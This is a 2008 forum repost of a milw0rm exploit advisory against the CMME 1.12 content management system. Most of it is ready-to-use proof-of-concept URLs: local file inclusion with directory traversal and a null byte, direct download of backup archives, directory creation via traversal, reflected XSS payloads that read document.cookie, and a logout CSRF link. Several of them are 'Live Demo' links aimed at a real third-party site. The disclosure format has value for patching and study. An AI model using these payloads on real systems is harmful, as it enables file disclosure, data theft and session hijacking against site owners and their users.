SirGod Posted August 26, 2008 Report Posted August 26, 2008 ##################################################################################################################[+] CMME 1.12 (LFI/XSS/CSRF/Download Backup/MkDir) Multiple Remote Vulnerabilities [+] Discovered By SirGod [+] MorTal TeaM [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz##################################################################################################################[+] Local File Inclusion Note : magic_quotes_gpc must be off. Example : [url]http://localhost/index.php?page=weblog&env=[/url][Local File]%00 PoC : [url]http://localhost/index.php?page=weblog&env=../../../autoexec.bat%00[/url][+] Download Backup Example 1: [url]http://localhost/backup/[/url][Backup Name].zip PoC 1: [url]http://localhost/backup/cmme_data.zip[/url] Live Demo 1: [url]http://cmme.oesterholt.net/backup/cmme_data.zip[/url] Example 2: [url]http://localhost/backup/[/url][Backup Name].zip PoC 2: [url]http://localhost/backup/cmme_cmme.zip[/url] Live Demo 2: [url]http://cmme.oesterholt.net/backup/cmme_cmme.zip[/url][+] Make Directory You can make multiple directories in website root folder. Example 1: [url]http://localhost/admin.php?action=login&page=home&script=index.php&env=[/url][Directory] PoC 1: http://localhost/admin.php?action=login&page=home&script=index.php&env=!!!Owned!!! Or you can make dir in previous directory,etc. Example 2: [url]http://localhost/admin.php?action=login&page=home&script=index.php&env=../[/url][Directory] PoC 2: http://localhost/admin.php?action=login&page=home&script=index.php&env=../!!!Owned!!![+] Cross Site Scripting Example 1: [url]http://localhost/statistics.php?action=hstat_year&page=[/url][XSS}&env=data PoC 1: http://localhost/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data Live Demo 1: http://cmme.oesterholt.net/statistics.php?action=hstat_year&page=<script>alert(document.cookie)</script>&env=data Example 2: [url]http://localhost/statistics.php?action=hstat_year&year=[/url][XSS]&env=data PoC 2: http://localhost/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data Live Demo 2: http://cmme.oesterholt.net/statistics.php?action=hstat_year&year=<script>alert(document.cookie)</script>&env=data[+] Cross Site Request Forgery If an logged in user with administrator privileges clicks the following link he will be logged out. [url]http://localhost/admin.php?action=logout&page=home&env=data[/url]################################################################################################################### milw0rm.com [2008-08-26] Quote